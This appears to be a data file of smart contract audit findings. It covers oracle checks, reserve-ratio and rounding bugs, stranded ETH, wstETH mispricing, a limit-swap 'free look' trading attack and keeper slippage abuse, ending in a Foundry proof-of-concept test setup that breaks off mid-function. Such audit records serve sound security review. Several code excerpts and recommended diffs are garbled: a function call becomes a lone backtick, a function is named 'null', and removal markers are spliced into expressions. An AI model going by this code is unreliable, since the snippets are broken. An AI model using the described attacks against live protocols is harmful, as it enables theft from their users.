sending `portfolio`, `balance` remains the same, which means `portfolio` is taken into account in the calculation of reserve ratio.\\nThis is problematic because `portfolio` is not available when user redeems, and user may not be able to fully redeem for USDT even when protocols says there is sufficient reserve ratio.\\nLet's assume :\\nUnitas's balance is 10000 USD and its portfolio is 2000 USD, avaliable balance is 8000 USD InsurancePool's balance is 3000 USD and its portfolio is 600 USD, available balance is 2400 USD AllReserves value is 13000 USD Liabilities (USDEMC) value is 10000 USD Reserve Ratio is (10000 + 3000) / 10000 = 130%.\\nLater on, USDEMC appreciates upto 10% and we can get:\\nAllReserves value is still 13000 USD Liabilities (USDEMC) value is 11000 USD Reserve Ratio is (10000 + 3000) / 11000 = 118%.\\nThe available balance in Unitas is 8000 USD so there is 3000 USD in short, it needs to be obtain from InsurancePool, however, the available balance in InsurancePool is 2400 USD, transaction will be reverted and users cannot redeem.\\nThere would also be an extreme situation when reserve ratio is above 100% but there is no available `balance` in protocol because all the `balance` is `portfolio` (this is possible when InsurancePool is drained out), users cannot redeem any USDT in this case.","Portfolio should not be taken into account for the calculation of reserve ratio.\\n```\\n function _getTotalReservesAndCollaterals() internal view returns (uint256 reserves, uint256 collaterals) {\\n // rest of code\\n// Remove the line below\\n uint256 tokenReserve = _getBalance(token);\\n// Add the line below\\n uint256 tokenReserve = _getBalance(token) // Remove the line below\\n _getPortfolio(token);\\n// Remove the line below\\n uint256 tokenCollateral = IInsurancePool(insurancePool).getCollateral(token);\\n// Add the line below\\n uint256 tokenCollateral = IInsurancePool(insurancePool).getCollateral(token) // Remove the line below\\n IInsurancePool(insurancePool).getPortfolio(token);\\n // rest of code\\n }\\n```\\n","Users may not be able to fully redeem USD1 into USDT even when reserve ratio is above 100%, this defeats the purpose of reserve ratio and breaks the promise of the protocol, users may be mislead and lose funds.","```\\n reserveRatio = ScalingUtils.scaleByBases(\\n allReserves * valueBase / liabilities,\\n valueBase,\\n tokenManager.RESERVE_RATIO_BASE()\\n );\\n```\\n" +"If any stable depegs, oracle will fail, disabling swaps",medium,"If any stable depegs, oracle will fail, disabling swaps\\nWhen swapping, the price of the asset/stable is fetched from OracleX. After fetching the price, the deviation is checked in the `_checkPrice` function.\\nIf the price of an asset/stable depegs, the following require will fail:\\n```\\n _require(minPrice <= price && price <= maxPrice, Errors.PRICE_INVALID);\\n```\\n\\nDue to the fail in the deviation, any swapping activity will be disabled by default and transactions will not go through",Use a secondary oracle when the first one fails and wrap the code in a try catch and store the last fetched price in a variable,Core functionality of the protocol will fail to work if any token they fetch depegs and its price goes outside the bounds.,"```\\n _require(minPrice <= price && price <= maxPrice, Errors.PRICE_INVALID);\\n```\\n" +supplyNativeToken will strand ETH in contract if called after ACTION_DEFER_LIQUIDITY_CHECK,high,"supplyNativeToken deposits msg.value to the WETH contract. This is very problematic if it is called after ACTION_DEFER_LIQUIDITY_CHECK. Since onDeferredLiqudityCheck creates a new context msg.value will be 0 and no ETH will actually be deposited for the user, causing funds to be stranded in the contract.\\nTxBuilderExtension.sol#L252-L256\\n```\\nfunction supplyNativeToken(address user) internal nonReentrant {\\n WethInterface(weth).deposit{value: msg.value}();\\n IERC20(weth).safeIncreaseAllowance(address(ironBank), msg.value);\\n ironBank.supply(address(this), user, weth, msg.value);\\n}\\n```\\n\\nsupplyNativeToken uses the context sensitive msg.value to determine how much ETH to send to convert to WETH. After ACTION_DEFER_LIQUIDITY_CHECK is called, it enters a new context in which msg.value is always 0. We can outline the execution path to see where this happens:\\n`execute > executeInteral > deferLiquidityCheck > ironBank.deferLiquidityCheck > onDeferredLiquidityCheck (new context) > executeInternal > supplyNativeToken`\\nWhen IronBank makes it's callback to TxBuilderExtension it creates a new context. Since the ETH is not sent along to this new context, msg.value will always be 0. Which will result in no ETH being deposited and the sent ether is left in the contract.\\nAlthough these funds can be recovered by the admin, it may can easily cause the user to be unfairly liquidated in the meantime since a (potentially significant) portion of their collateral hasn't been deposited. Additionally in conjunction with my other submission on ownable not being initialized correctly, the funds would be completely unrecoverable due to lack of owner.",msg.value should be cached at the beginning of the function to preserve it across contexts,User funds are indefinitely (potentially permanently) stuck in the contract. Users may be unfairly liquidated due to their collateral not depositing.,"```\\nfunction supplyNativeToken(address user) internal nonReentrant {\\n WethInterface(weth).deposit{value: msg.value}();\\n IERC20(weth).safeIncreaseAllowance(address(ironBank), msg.value);\\n ironBank.supply(address(this), user, weth, msg.value);\\n}\\n```\\n" +PriceOracle.getPrice doesn't check for stale price,medium,"PriceOracle.getPrice doesn't check for stale price. As result protocol can make decisions based on not up to date prices, which can cause loses.\\n```\\n function getPriceFromChainlink(address base, address quote) internal view returns (uint256) {\\n (, int256 price,,,) = registry.latestRoundData(base, quote);\\n require(price > 0, ""invalid price"");\\n\\n // Extend the decimals to 1e18.\\n return uint256(price) * 10 ** (18 - uint256(registry.decimals(base, quote)));\\n }\\n```\\n\\nThis function doesn't check that prices are up to date. Because of that it's possible that price is not outdated which can cause financial loses for protocol.",You need to check that price is not outdated by checking round timestamp.,Protocol can face bad debt.,"```\\n function getPriceFromChainlink(address base, address quote) internal view returns (uint256) {\\n (, int256 price,,,) = registry.latestRoundData(base, quote);\\n require(price > 0, ""invalid price"");\\n\\n // Extend the decimals to 1e18.\\n return uint256(price) * 10 ** (18 - uint256(registry.decimals(base, quote)));\\n }\\n```\\n" +PriceOracle will use the wrong price if the Chainlink registry returns price outside min/max range,medium,"Chainlink aggregators have a built in circuit breaker if the price of an asset goes outside of a predetermined price band. The result is that if an asset experiences a huge drop in value (i.e. LUNA crash) the price of the oracle will continue to return the minPrice instead of the actual price of the asset. This would allow user to continue borrowing with the asset but at the wrong price. This is exactly what happened to Venus on BSC when LUNA imploded.\\nNote there is only a check for `price` to be non-negative, and not within an acceptable range.\\n```\\nfunction getPriceFromChainlink(address base, address quote) internal view returns (uint256) {\\n (, int256 price,,,) = registry.latestRoundData(base, quote);\\n require(price > 0, ""invalid price"");\\n\\n // Extend the decimals to 1e18.\\n return uint256(price) * 10 ** (18 - uint256(registry.decimals(base, quote)));\\n}\\n```\\n\\nA similar issue is seen here.","Implement the proper check for each asset. It must revert in the case of bad price.\\n```\\nfunction getPriceFromChainlink(address base, address quote) internal view returns (uint256) {\\n (, int256 price,,,) = registry.latestRoundData(base, quote);\\n require(price >= minPrice && price <= maxPrice, ""invalid price""); // @audit use the proper minPrice and maxPrice for each asset\\n\\n // Extend the decimals to 1e18.\\n return uint256(price) * 10 ** (18 - uint256(registry.decimals(base, quote)));\\n}\\n```\\n",The wrong price may be returned in the event of a market crash. An adversary will then be able to borrow against the wrong price and incur bad debt to the protocol.,"```\\nfunction getPriceFromChainlink(address base, address quote) internal view returns (uint256) {\\n (, int256 price,,,) = registry.latestRoundData(base, quote);\\n require(price > 0, ""invalid price"");\\n\\n // Extend the decimals to 1e18.\\n return uint256(price) * 10 ** (18 - uint256(registry.decimals(base, quote)));\\n}\\n```\\n" +Wrong Price will be Returned When Asset is PToken for WstETH,medium,"Iron Bank allows a PToken market to be created for an underlying asset in addition to a lending market. PTokens can be counted as user collaterals and their price is fetched based on their underlying tokens. However, wrong price will return when PToken's underlying asset is WstETH.\\nRetrieving price for WstETH is a 2 step process. WstETH needs to be converted to stETH first, then converted to ETH/USD. This is properly implemented when the market is WstETH through checking `if (asset==wsteth)`. But when PToken market is created for WstETH, this check will by bypassed because PToken contract address will be different from wsteth address.\\nPToken market price is set through `_setAggregators()` in PriceOracle.sol where base and quote token address are set and tested before writing into `aggregators` array. And note that quote token address can either be ETH or USD. When asset price is accessed through `getPrice()`, if the input asset is not `wsteth` address, `aggregators` is directly pulled to get chainlink price denominated in ETH or USD.\\n```\\n//PriceOracle.sol\\n//_setAggregators()\\n require(\\n aggrs[i].quote == Denominations.ETH ||\\n aggrs[i].quote == Denominations.USD,\\n ""unsupported quote""\\n );\\n```\\n\\n```\\n//PriceOracle.sol\\n function getPrice(address asset) external view returns (uint256) {\\n if (asset == wsteth) {\\n uint256 stEthPrice = getPriceFromChainlink(\\n steth,\\n Denominations.USD\\n );\\n uint256 stEthPerToken = WstEthInterface(wsteth).stEthPerToken();\\n uint256 wstEthPrice = (stEthPrice * stEthPerToken) / 1e18;\\n return getNormalizedPrice(wstEthPrice, asset);\\n }\\n AggregatorInfo memory aggregatorInfo = aggregators[asset];\\n uint256 price = getPriceFromChainlink(\\n aggregatorInfo.base,\\n aggregatorInfo.quote\\n );\\n // rest of code\\n```\\n\\nThis creates a problem for PToken for WstETH, because `if (asset==wsteth)` will be bypassed and chainlink aggregator price will be returned. And chainlink doesn't have a direct price quote of WstETH/ETH or WstETH/USD, only WstETH/stETH or stETH/USD. This means most likely aggregator price for stETH/USD will be returned as price for WstETH.\\nSince stETH is a rebasing token, and WstETH:stETH is not 1 to 1, this will create a wrong valuation for users holding PToken for WstETH as collaterals.","In `getPrice()`, consider adding another check whether the asset is PToken and its underlying asset is WstETH. If true, use the same bypass for pricing.","Since users holding PToken for WstETH will have wrong valuation, this potentially creates opportunities for malicious over-borrowing or unfair liquidations, putting the protocol at risk.","```\\n//PriceOracle.sol\\n//_setAggregators()\\n require(\\n aggrs[i].quote == Denominations.ETH ||\\n aggrs[i].quote == Denominations.USD,\\n ""unsupported quote""\\n );\\n```\\n" +Limit swap orders can be used to get a free look into the future,high,"Users can cancel their limit swap orders to get a free look into prices in future blocks\\nThis is a part of the same issue that was described in the last contest. The sponsor fixed the bug for `LimitDecrease` and `StopLossDecrease`, but not for `LimitSwap`.\\nAny swap limit order submitted in block range N can't be executed until block range N+2, because the block range is forced to be after the submitted block range, and keepers can't execute until the price has been archived, which necessarily won't be until after block range N+1. Consider what happens when half of the oracle's block ranges are off from the other half, e.g.:\\n```\\n 1 2 3 4 5 6 7 8 9 < block number\\nO1: A B B B B C C C D\\nA A B B B B C C C\\n^^ grouped oracle block ranges\\n```\\n\\nAt block 1, oracles in both groups (O1 and O2) are in the same block range A, and someone submits a large swap limit order (N). At block 6, oracles in O1 are in N+2, but oracles in O2 are still in N+1. This means that the swap limit order will execute at the median price of block 5 (since the earliest group to have archive prices at block 6 for N+1 will be O1) and market swap order submitted at block 6 in the other direction will execute at the median price of block 6 since O2 will be the first group to archive a price range that will contain block 6. By the end of block 5, the price for O1 is known, and the price that O2 will get at block 6 can be predicted with high probability (e.g. if the price has just gapped a few cents), so a trader will know whether the two orders will create a profit or not. If a profit is expected, they'll submit the market order at block 6. If a loss is expected, they'll cancel the swap limit order from block 1, and only have to cover gas fees.\\nEssentially the logic is that limit swap orders will use earlier prices, and market orders (with swaps) will use later prices, and since oracle block ranges aren't fixed, an attacker is able to know both prices before having their orders executed, and use large order sizes to capitalize on small price differences.",Issue Limit swap orders can be used to get a free look into the future\\nAll orders should follow the same block range rules,"There is a lot of work involved in calculating statistics about block ranges for oracles and their processing time/queues, and ensuring one gets the prices essentially when the keepers do, but this is likely less work than co-located high frequency traders in traditional finance have to do, and if there's a risk free profit to be made, they'll put in the work to do it every single time, at the expense of all other traders.",```\\n 1 2 3 4 5 6 7 8 9 < block number\\nO1: A B B B B C C C D\\nA A B B B B C C C\\n^^ grouped oracle block ranges\\n```\\n +User can loose funds in case if swapping in DecreaseOrderUtils.processOrder will fail,medium,"When user executes decrease order, then he provides `order.minOutputAmount` value, that should protect his from loses. This value is provided with hope that swapping that will take some fees will be executed. But in case if swapping will fail, then this `order.minOutputAmount` value will be smaller then user would like to receive in case when swapping didn't occur. Because of that user can receive less output amount.\\n`DecreaseOrderUtils.processOrder` function executed decrease order and returns order execution result which contains information about output tokens and amounts that user should receive.\\n```\\n try params.contracts.swapHandler.swap(\\n SwapUtils.SwapParams(\\n params.contracts.dataStore,\\n params.contracts.eventEmitter,\\n params.contracts.oracle,\\n Bank(payable(order.market())),\\n params.key,\\n result.outputToken,\\n result.outputAmount,\\n params.swapPathMarkets,\\n 0,\\n order.receiver(),\\n order.uiFeeReceiver(),\\n order.shouldUnwrapNativeToken()\\n )\\n ) returns (address tokenOut, uint256 swapOutputAmount) {\\n `(\\n params.contracts.oracle,\\n tokenOut,\\n swapOutputAmount,\\n order.minOutputAmount()\\n );\\n } catch (bytes memory reasonBytes) {\\n (string memory reason, /* bool hasRevertMessage */) = ErrorUtils.getRevertMessage(reasonBytes);\\n\\n _handleSwapError(\\n params.contracts.oracle,\\n order,\\n result,\\n reason,\\n reasonBytes\\n );\\n }\\n }\\n```\\n\\n```\\n null(\\n Oracle oracle,\\n Order.Props memory order,\\n DecreasePositionUtils.DecreasePositionResult memory result,\\n string memory reason,\\n bytes memory reasonBytes\\n ) internal {\\n emit SwapUtils.SwapReverted(reason, reasonBytes);\\n\\n _validateOutputAmount(\\n oracle,\\n result.outputToken,\\n result.outputAmount,\\n order.minOutputAmount()\\n );\\n\\n MarketToken(payable(order.market())).transferOut(\\n result.outputToken,\\n order.receiver(),\\n result.outputAmount,\\n order.shouldUnwrapNativeToken()\\n );\\n }\\n```\\n\\nAs you can see in this case `_validateOutputAmount` function will be called as well, but it will be called with `result.outputAmount` this time, which is amount provided by decreasing of position.\\nNow i will describe the problem. In case if user wants to swap his token, he knows that he needs to pay fees to the market pools and that this swap will eat some amount of output. So in case if `result.outputAmount` is 100$ worth of tokenA, it's fine if user will provide slippage as 3% if he has long swap path, so his slippage is 97$. But in case when swap will fail, then now this slippage of 97$ is incorrect as user didn't do swapping and he should receiev exactly 100$ worth of tokenA.\\nAlso i should note here, that it's easy to make swap fail for keeper, it's enough for him to just not provide any asset price, so swap reverts. So keeper can benefit on this slippage issue.","Issue User can loose funds in case if swapping in DecreaseOrderUtils.processOrder will fail\\nMaybe it's needed to have another slippage param, that should be used in case of no swapping.",User can be frontruned to receive less amount in case of swapping error.,"```\\n try params.contracts.swapHandler.swap(\\n SwapUtils.SwapParams(\\n params.contracts.dataStore,\\n params.contracts.eventEmitter,\\n params.contracts.oracle,\\n Bank(payable(order.market())),\\n params.key,\\n result.outputToken,\\n result.outputAmount,\\n params.swapPathMarkets,\\n 0,\\n order.receiver(),\\n order.uiFeeReceiver(),\\n order.shouldUnwrapNativeToken()\\n )\\n ) returns (address tokenOut, uint256 swapOutputAmount) {\\n `(\\n params.contracts.oracle,\\n tokenOut,\\n swapOutputAmount,\\n order.minOutputAmount()\\n );\\n } catch (bytes memory reasonBytes) {\\n (string memory reason, /* bool hasRevertMessage */) = ErrorUtils.getRevertMessage(reasonBytes);\\n\\n _handleSwapError(\\n params.contracts.oracle,\\n order,\\n result,\\n reason,\\n reasonBytes\\n );\\n }\\n }\\n```\\n" +MarketUtils.getFundingAmountPerSizeDelta() has a rounding logical error.,medium,"`MarketUtils.getFundingAmountPerSizeDelta()` has a rounding logical error. The main problem is the divisor always use a roundupDivision regardless of the input `roundUp` rounding mode. Actually the correct use should be: the divisor should use the opposite of `roundup` to achieve the same logic of rounding.\\n`MarketUtils.getFundingAmountPerSizeDelta()` is used to calculate the `FundingAmountPerSizeDelta` with a roundup input mode parameter.\\nThis function is used for example by the IncreaseLimit order via flow `OrderHandler.executeOrder() -> _executeOrder() -> OrderUtils.executeOrder() -> processOrder() -> IncreaseOrderUtils.processOrder() -> IncreasePositionUtils.increasePosition() -> PositionUtils.updateFundingAndBorrowingState() -> MarketUtils.updateFundingAmoutPerSize() -> getFundingAmountPerSizeDelta()`.\\nHowever, the main problem is the divisor always use a roundupDivision regardless of the input `roundUp` rounding mode. Actually the correct use should be: the divisor should use the opposite of `roundup` to achieve the same logic of rounding.\\nMy POC code confirms my finding: given fundingAmount = 2e15, openInterest = 1e15+1, and roundup = true, the correct answer should be: 1999999999999998000000000000001999999999999999. However, the implementation returns the wrong solution of : 1000000000000000000000000000000000000000000000. The reason is that the divisor uses a roundup and gets a divisor of 2, as a result, the final result is actually rounded down rather than rounding up!\\n```\\nfunction testGetFundingAmountPerSizeDelta() public{\\n uint result = MarketUtils.getFundingAmountPerSizeDelta(2e15, 1e15+1, true);\\n console2.log(""result: %d"", result);\\n uint256 correctResult = 2e15 * 1e15 * 1e30 + 1e15; // this is a real round up\\n correctResult = correctResult/(1e15+1);\\n console2.log(""correctResult: %d"", correctResult);\\n assertTrue(result == 1e15 * 1e30);\\n }\\n```\\n","Change the rounding mode of the divisor to the opposite of the input `roundup` mode. Or, the solution can be just as follows:\\n```\\nfunction getFundingAmountPerSizeDelta(\\n uint256 fundingAmount,\\n uint256 openInterest,\\n bool roundUp\\n ) internal pure returns (uint256) {\\n if (fundingAmount == 0 || openInterest == 0) { return 0; }\\n \\n \\n\\n // how many units in openInterest\\n// Remove the line below\\n uint256 divisor = Calc.roundUpDivision(openInterest, Precision.FLOAT_PRECISION_SQRT);\\n\\n// Remove the line below\\n return Precision.toFactor(fundingAmount, divisor, roundUp);\\n// Add the line below\\n return Precision.toFactor(fundingAmount*Precision.FLOAT_PRECISION_SQRT, openInterest, roundUp\\n }\\n```\\n","MarketUtils.getFundingAmountPerSizeDelta() has a rounding logical error, sometimes, when roundup = true, the result, instead of rounding up, it becomes a rounding down!","```\\nfunction testGetFundingAmountPerSizeDelta() public{\\n uint result = MarketUtils.getFundingAmountPerSizeDelta(2e15, 1e15+1, true);\\n console2.log(""result: %d"", result);\\n uint256 correctResult = 2e15 * 1e15 * 1e30 + 1e15; // this is a real round up\\n correctResult = correctResult/(1e15+1);\\n console2.log(""correctResult: %d"", correctResult);\\n assertTrue(result == 1e15 * 1e30);\\n }\\n```\\n" +"PositionUtils.validatePosition() uses ``isIncrease`` instead of ``false`` when calling isPositionLiquidatable(), making it not work properly for the case of ``isIncrease = true``.",medium,"`PositionUtils.validatePosition()` uses `isIncrease` instead of `false` when calling `isPositionLiquidatable()`, making it not work properly for the case of `isIncrease` = true. The main problem is that when calling `isPositionLiquidatable()`, we should always consider decreasing the position since we are proposing a liquidation trade (which is a decrease in position). Therefore, it should not use `isIncrease` for the input parameter for `isPositionLiquidatable()`. We should always use `false` instead.\\n`PositionUtils.validatePosition()` is called to validate whether a position is valid in both collateral size and position size, and in addition, to check if the position is liquidable:\\nIt calls function `isPositionLiquidatable()` to check if a position is liquidable. However, it passes the `isIncrease` to function `isPositionLiquidatable()` as an argument. Actually, the `false` value should always be used for calling function `isPositionLiquidatable()` since a liquidation is always a decrease position operation. A position is liquidable or not has nothing to do with exiting trade operations and only depend on the parameters of the position per se.\\nCurrent implementation has a problem for an increase order: Given a Increase order, for example, increase a position by $200, when `PositionUtils.validatePosition()` is called, which is after the position has been increased, we should not consider another $200 increase in `isPositionLiquidatable()` again as part of the price impact calculation. This is double-accouting for price impact calculation, one during the position increasing process, and another in the position validation process. On the other hand, if we use `false` here, then we are considering a decrease order (since a liquidation is a decrease order) and evaluate the hypothetical price impact if the position will be liquidated.\\nOur POC code confirms my finding: intially, we don't have any positions, after executing a LimitIncrease order, the priceImpactUsd is evaluaed as follows (notice initialDiffUsd = 0):\\nPositionPricingUtils.getPriceImpactUsd started... openInterestParams.longOpenInterest: 0 openInterestParams.shortOpenInterest: 0 initialDiffUsd: 0 nextDiffUsd: 1123456700000000000000000000000 positiveImpactFactor: 50000000000000000000000 negativeImpactFactor: 100000000000000000000000 positiveImpactUsd: 0 negativeImpactUsd: 63107747838744499100000 deltaDiffUsd: 63107747838744499100000 priceImpactUsd: -63107747838744499100000 PositionPricingUtils.getPriceImpactUsd() completed. Initial priceImpactUsd: -63107747838744499100000 Capped priceImpactUsd: -63107747838744499100000\\nThen, during validation, when `PositionUtils.validatePosition()` is called, the double accouting occurs, notice the `nextDiffUsd` is doubled, as if the limitOrder was executed for another time!\\nPositionPricingUtils.getPriceImpactUsd started... openInterestParams.longOpenInterest: 1123456700000000000000000000000 openInterestParams.shortOpenInterest: 0 initialDiffUsd: 1123456700000000000000000000000 nextDiffUsd: 2246913400000000000000000000000 impactFactor: 100000000000000000000000 impactExponentFactor: 2000000000000000000000000000000 deltaDiffUsd: 189323243516233497450000 priceImpactUsd: -189323243516233497450000 priceImpactUsd: -189323243516233497450000 adjusted 2: priceImpactUsd: 0\\nThe POC code is as follows, pay attention to the `testLimit()` and the execution of `createLimitIncreaseOrder()`. Please comment out the checks for signature, timestamp and block number for oracle price in the source code to run the testing smoothly without revert.\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nimport ""forge-std/Test.sol"";\\nimport ""../contracts/role/RoleStore.sol"";\\nimport ""../contracts/router/ExchangeRouter.sol"";\\nimport ""../contracts/data/DataStore.sol"";\\nimport ""../contracts/referral/ReferralStorage.sol"";\\n\\nimport ""../contracts/token/IWNT.sol"";\\nimport ""../contracts/token/WNT.sol"";\\nimport ""../contracts/token/SOLToken.sol"";\\nimport ""../contracts/token/USDC.sol"";\\nimport ""../contracts/token/tokenA.sol"";\\nimport ""../contracts/token/tokenB.sol"";\\nimport ""../contracts/token/tokenC.sol"";\\n\\nimport ""../contracts/market/MarketFactory.sol"";\\nimport ""../contracts/deposit/DepositUtils.sol"";\\nimport ""../contracts/oracle/OracleUtils.sol"";\\nimport ""@openzeppelin/contracts/utils/introspection/ERC165Checker.sol"";\\nimport ""../contracts/withdrawal/WithdrawalUtils.sol"";\\nimport ""../contracts/order/Order.sol"";\\nimport ""../contracts/order/BaseOrderUtils.sol"";\\nimport ""../contracts/price/Price.sol"";\\nimport ""../contracts/utils/Debug.sol"";\\nimport ""../contracts/position/Position.sol"";\\nimport ""../contracts/exchange/LiquidationHandler.sol"";\\nimport ""../contracts/utils/Calc.sol"";\\nimport ""@openzeppelin/contracts/utils/math/SignedMath.sol"";\\nimport ""@openzeppelin/contracts/utils/math/SafeCast.sol"";\\n\\n\\ncontract CounterTest is Test, Debug{\\n using SignedMath for int256;\\n using SafeCast for uint256;\\n\\n\\n WNT _wnt; \\n USDC _usdc;\\n SOLToken _sol;\\n tokenA _tokenA;\\n tokenB _tokenB;\\n tokenC _tokenC;\\n\\n RoleStore _roleStore;\\n Router _router;\\n DataStore _dataStore;\\n EventEmitter _eventEmitter;\\n DepositVault _depositVault;\\n OracleStore _oracleStore; \\n Oracle _oracle;\\n DepositHandler _depositHandler;\\n WithdrawalVault _withdrawalVault;\\n WithdrawalHandler _withdrawalHandler;\\n OrderHandler _orderHandler;\\n SwapHandler _swapHandler;\\n LiquidationHandler _liquidationHandler;\\n ReferralStorage _referralStorage;\\n OrderVault _orderVault;\\n ExchangeRouter _erouter;\\n MarketFactory _marketFactory;\\n Market.Props _marketProps1;\\n Market.Props _marketPropsAB;\\n Market.Props _marketPropsBC;\\n Market.Props _marketPropsCwnt;\\n \\n \\n address depositor1;\\n address depositor2;\\n address depositor3;\\n address uiFeeReceiver = address(333);\\n\\n\\n function testGetFundingAmountPerSizeDelta() public{\\n uint result = MarketUtils.getFundingAmountPerSizeDelta(2e15, 1e15+1, true);\\n console2.log(""result: %d"", result);\\n uint256 correctResult = 2e15 * 1e15 * 1e30 + 1e15; // this is a real round up\\n correctResult = correctResult/(1e15+1);\\n console2.log(""correctResult: %d"", correctResult);\\n assertTrue(result == 1e15 * 1e30);\\n }\\n\\n \\n\\n function setUp() public {\\n _wnt = new WNT();\\n _usdc = new USDC();\\n _sol = new SOLToken();\\n _tokenA = new tokenA();\\n _tokenB = new tokenB();\\n _tokenC = new tokenC();\\n \\n\\n\\n _roleStore = new RoleStore();\\n _router = new Router(_roleStore);\\n _dataStore = new DataStore(_roleStore);\\n \\n _eventEmitter= new EventEmitter(_roleStore);\\n _depositVault = new DepositVault(_roleStore, _dataStore);\\n _oracleStore = new OracleStore(_roleStore, _eventEmitter);\\n _oracle = new Oracle(_roleStore, _oracleStore);\\n console2.logString(""_oracle:""); console2.logAddress(address(_oracle));\\n \\n _depositHandler = new DepositHandler(_roleStore, _dataStore, _eventEmitter, _depositVault, _oracle);\\n console2.logString(""_depositHandler:""); console2.logAddress(address(_depositHandler));\\n \\n\\n _withdrawalVault = new WithdrawalVault(_roleStore, _dataStore);\\n _withdrawalHandler = new WithdrawalHandler(_roleStore, _dataStore, _eventEmitter, _withdrawalVault, _oracle);\\n \\n \\n _swapHandler = new SwapHandler(_roleStore);\\n _orderVault = new OrderVault(_roleStore, _dataStore);\\n _referralStorage = new ReferralStorage();\\n\\n\\n \\n _orderHandler = new OrderHandler(_roleStore, _dataStore, _eventEmitter, _orderVault, _oracle, _swapHandler, _referralStorage); \\n _erouter = new ExchangeRouter(_router, _roleStore, _dataStore, _eventEmitter, _depositHandler, _withdrawalHandler, _orderHandler);\\n console2.logString(""_erouter:""); console2.logAddress(address(_erouter));\\n _liquidationHandler = new LiquidationHandler(_roleStore, _dataStore, _eventEmitter, _orderVault, _oracle, _swapHandler, _referralStorage);\\n \\n _referralStorage.setHandler(address(_orderHandler), true); \\n\\n /* set myself as the controller so that I can set the address of WNT (wrapped native token contracdt) */\\n _roleStore.grantRole(address(this), Role.CONTROLLER);\\n _roleStore.grantRole(address(this), Role.MARKET_KEEPER);\\n \\n _dataStore.setUint(Keys.MAX_SWAP_PATH_LENGTH, 5); // at most 5 markets in the path\\n \\n _dataStore.setAddress(Keys.WNT, address(_wnt));\\n\\n /* set the token transfer gas limit for wnt as 3200 */\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_wnt)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_usdc)), 32000); \\n \\n\\n /* create a market (SQL, WNT, ETH, USDC) */\\n _marketFactory = new MarketFactory(_roleStore, _dataStore, _eventEmitter);\\n console2.logString(""_marketFactory:""); console2.logAddress(address(_marketFactory));\\n _roleStore.grantRole(address(_marketFactory), Role.CONTROLLER); // to save a market's props\\n _roleStore.grantRole(address(_erouter), Role.CONTROLLER); \\n _roleStore.grantRole(address(_depositHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_withdrawalHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_swapHandler), Role.CONTROLLER);\\n _roleStore.grantRole(address(_orderHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_liquidationHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_oracleStore), Role.CONTROLLER); // so it can call EventEmitter\\n _roleStore.grantRole(address(_oracle), Role.CONTROLLER); // so it can call EventEmitter\\n _roleStore.grantRole(address(this), Role.ORDER_KEEPER);\\n _roleStore.grantRole(address(this), Role.LIQUIDATION_KEEPER);\\n\\n \\n _marketProps1 = _marketFactory.createMarket(address(_sol), address(_wnt), address(_usdc), keccak256(abi.encode(""sol-wnt-usdc""))); \\n _marketPropsAB = _marketFactory.createMarket(address(0), address(_tokenA), address(_tokenB), keccak256(abi.encode(""swap-tokenA-tokenB""))); \\n _marketPropsBC = _marketFactory.createMarket(address(0), address(_tokenB), address(_tokenC), keccak256(abi.encode(""swap-tokenB-tokenC""))); \\n _marketPropsCwnt = _marketFactory.createMarket(address(0), address(_tokenC), address(_wnt), keccak256(abi.encode(""swap-tokenC-wnt""))); \\n \\n \\n _dataStore.setUint(Keys.minCollateralFactorForOpenInterestMultiplierKey(_marketProps1.marketToken, true), 1e25);\\n _dataStore.setUint(Keys.minCollateralFactorForOpenInterestMultiplierKey(_marketProps1.marketToken, false), 1e25);\\n \\n // see fees for the market\\n _dataStore.setUint(Keys.swapFeeFactorKey(_marketProps1.marketToken), 0.05e30); // 5%\\n _dataStore.setUint(Keys.SWAP_FEE_RECEIVER_FACTOR, 0.5e30);\\n _dataStore.setUint(Keys.positionFeeFactorKey(_marketProps1.marketToken), 0.00001234e30); // 2%\\n _dataStore.setUint(Keys.POSITION_FEE_RECEIVER_FACTOR, 0.15e30);\\n _dataStore.setUint(Keys.MAX_UI_FEE_FACTOR, 0.01e30);\\n _dataStore.setUint(Keys.uiFeeFactorKey(uiFeeReceiver), 0.01e30); // only when this is set, one can receive ui fee, so stealing is not easy\\n _dataStore.setInt(Keys.poolAmountAdjustmentKey(_marketProps1.marketToken, _marketProps1.longToken), 1);\\n _dataStore.setInt(Keys.poolAmountAdjustmentKey(_marketProps1.marketToken, _marketProps1.shortToken), 1);\\n _dataStore.setUint(Keys.swapImpactExponentFactorKey(_marketProps1.marketToken), 10e28);\\n _dataStore.setUint(Keys.swapImpactFactorKey(_marketProps1.marketToken, true), 0.99e30);\\n _dataStore.setUint(Keys.swapImpactFactorKey(_marketProps1.marketToken, false), 0.99e30);\\n\\n \\n \\n \\n // set gas limit to transfer a token\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_sol)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_wnt)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_usdc)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_tokenA)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_tokenB)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_tokenC)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketProps1.marketToken)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketPropsAB.marketToken)), 32000);\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketPropsBC.marketToken)), 32000);\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketPropsCwnt.marketToken)), 32000);\\n\\n\\n /* Configure the system parameters/limits here */\\n _dataStore.setUint(Keys.MAX_CALLBACK_GAS_LIMIT, 10000);\\n _dataStore.setUint(Keys.EXECUTION_GAS_FEE_BASE_AMOUNT, 100);\\n _dataStore.setUint(Keys.MAX_ORACLE_PRICE_AGE, 2 hours);\\n _dataStore.setUint(Keys.MIN_ORACLE_BLOCK_CONFIRMATIONS, 3);\\n _dataStore.setUint(Keys.MIN_COLLATERAL_USD, 1e30); // just require $1 as min collateral usd\\n _dataStore.setUint(Keys.reserveFactorKey(_marketProps1.marketToken, true), 5e29); // 50%\\n 